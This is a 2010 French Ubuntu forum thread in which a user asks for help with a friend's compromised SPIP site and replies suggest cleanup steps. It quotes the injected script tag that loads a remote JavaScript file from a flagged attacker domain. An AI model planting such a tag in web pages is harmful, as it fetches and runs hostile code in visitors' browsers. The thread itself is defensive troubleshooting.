Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

Pages : 1

#1 Le 25/06/2010, à 10:39

genma

Pb avec un site web

Sur le site d'un ami hébergé chez Free, ça met très longtemps à se lancer et dans la barre d'état de firefox, j'ai pu lire "en attente de assolkh.blackhulu.com"

Si je regarde le code source de la page, je vois en dernière ligne, en plus du code classique HTML correspondant à son site :

<script type="text/javascript" src="http://assolkh.blackhulu.com:8080/Yahoo.js"></script>

Je cherche un peu sur google : "assolkh.blackhulu.com"

Et j'ai trouvé :
http://safeweb.norton.com/report/show?n … ckhulu.com

Rapport de menace
Nombre total de menaces trouvées : 1

Qu'en pensez-vous? Perso, je pense à un hack du site avec ajout du lien pour lancer automatique un script qui, si il trouve la faille, injecte un cheval de troie. Le site tourne sous SPIP, probablement une version 1.9, peut être 2.0. Auriez vous des conseils à me donner pour l'aider à investiguer?

"Lorsque tu as découvert le libre, tu sais que tu ne pourras plus jamais revenir en arrière".
Utilisateur d'Ubuntu depuis la version 4.10 !
Mon blog ?      https://blog.genma.fr
Mon twitter?     http://twitter.com/genma

Hors ligne

#2 Le 25/06/2010, à 12:23

obibann

Re : Pb avec un site web

En effet, ça sens le hack.
Cependant, tu ne crains pas grand chose d'un fichier javascript wink A part t'afficher une page à la con le risque est faible (bon sauf si tu es sous Windows avec Internet Explorer lol)

Ubuntu 16.04
Avec Windows, on fait ce qu'on peut... Avec Linux, on fait ce qu'on veut !! :p

Hors ligne

#3 Le 25/06/2010, à 13:28

abelthorne

Re : Pb avec un site web

Dis à ton pote de commencer par se connecter à son site en FTP pour voir s'il n'y aurait pas eu ajout de dossiers/scripts/etc. qui serviraient à faire du phishing ou quelque chose dans le genre.

Ensuite, qu'il retrouve dans les sources du site la ligne qui a été rajoutée et qu'il la vire, tout simplement. Si elle se trouve tout à la fin du code, qu'il commence par vérifier dans le footer, les gabarits du thème utilisé, etc. (Je ne connais pas SPIP en particulier, mais j'imagine qu'il fonctionne avec des thèmes/gabarits, comme la plupart des CMS et approchants.)

Au passage, ça peut être utile de passer à la dernière version de SPIP si ce n'est pas le cas, des fois que le script en question ait profité d'une faille qui est peut-être corrigée.

Hors ligne

Pages : 1